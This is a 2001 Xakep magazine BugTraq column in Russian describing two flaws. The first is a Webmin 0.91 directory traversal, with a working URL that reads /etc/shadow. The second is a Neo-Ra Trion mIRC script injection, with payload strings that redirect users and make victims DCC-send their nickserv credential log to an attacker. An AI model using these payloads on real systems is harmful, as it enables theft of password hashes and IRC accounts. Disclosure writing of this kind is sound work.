BugTraq
Xakep, номер #037, стр. 037-008-1
SideX (sidex@real.xakep.ru)
Проблемы с директориями Webmin'a
BT id 3698
Класс: ошибка ввода
Тип эксплойтинга: удаленный
Уязвимый продукт: Webmin Webmin 0.91 (http://www.webmin.com/webmin/)
Автор: A. Ramos aramos@aramos-test.prisacom.int
Дата 17.12.2001
Когда админ-приятель установил на свой сервер Webmin'a, общие знакомые заподозрили идею запуска free shell hosting'a в этом шаге - уж очень часто ломалась эта оболочка. Да и редко встретишь профессионального adm, кто бы пользовался шнягами типа Вебмина...
Для не ведавших доныне сути дырявой проги поясню, что Webmin - web-базированный интерфейс для администрирования *nix'а. Используя любой браузер, поддерживающий таблички и формы, можно модифицировать (создавать/удалять) юзерские аккаунты, мутить Apache, DNS, расшаривать файлы и т.д. Обычно Webmin успешно принимается всеми клонами *nix.
Баг начинается при неадекватной фильтрации последовательности "../" при веб-запросах, позволяющей реализовать атаку. Кроме того, если через Webmin можно совершать ряд серьезных настроек, он будет требовать root-привилегий в администрируемой *nix-системе. А там где r00t, там и полный доступ. Полный доступ к файлам системы, заряженной уязвимым софтом от Webmin'a. Также предположительно возможно редактирование файлов системы и их замена. Финальный результат - захват r00t привилегий. Эксплойта не нужно, просто забивается http://www.domain.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+http://etc/shadow. Баг правится в течение 30 секунд редактированием edit_action.cgi, код по адресу в BT. На сайте же проги, в момент постинга нашего багтрека, все еще покоилась дырявая 0.91 версия...
Мелкие пакости Neo-Ra Trion
Класс: ошибка проверки корректности
Тип эксплойтинга: удаленный
Уязвимый продукт: Neo-Ra Trion v 1.0 (www.neora.ru)
Автор: Unknow Haqsaz Grupp
Дата: 9.12.2001
Сложно найти более неблагодарное занятие, чем написание irc-скриптов (особенно под win-клиенты): чайник не оценит тебя $, т.к. все скрипты подобного рода бесплатны, а профессионал сразу отметит примитивность данного занятия. Но находятся люди, целые группы людей, кто лепит скрипты и плугины под mIRC. Наиболее известная группировка мирк-скриптеров в RU - NeoRa. Неизвестная хагруппа забросила увесистый камень в их огород...
Модифицированный Trion'ом mIRC сохраняет по умолчанию топики со всех посещенных каналов в topics.txt, а все обращения к nickserv - в nickserv.txt, соответственно. Проблема прячется в отсутствии проверки входящих данных на корректность. Нашедшие баг заявили, что наиболее эффективно клиент эксплойтится занесенной в topic канала фразой «} /server» (пробел) - вошедшие юзеры Trion'a будут моментально перекинуты на другой irc-сервис исполненной командой /server. По собственному же опыту пребывания на DALnet, замечу, что лично при мне было похищено более 5 ников путем занесения в quit-message " } /dcc send твой_ник $mircdir\texts\nickserv.txt". В результате жертва отсылала по dcc свой ns-лог атакующему. Замечу, что был использован quit, т.к. далеко не у всех есть статусы (@) на многолюдных каналах, где пасутся юзверы дырявых скриптов ;). Баг более чем детский и забавный. В то же время он поддерживает нашего производителя: россияне лепят дыру, россияне же его находят.
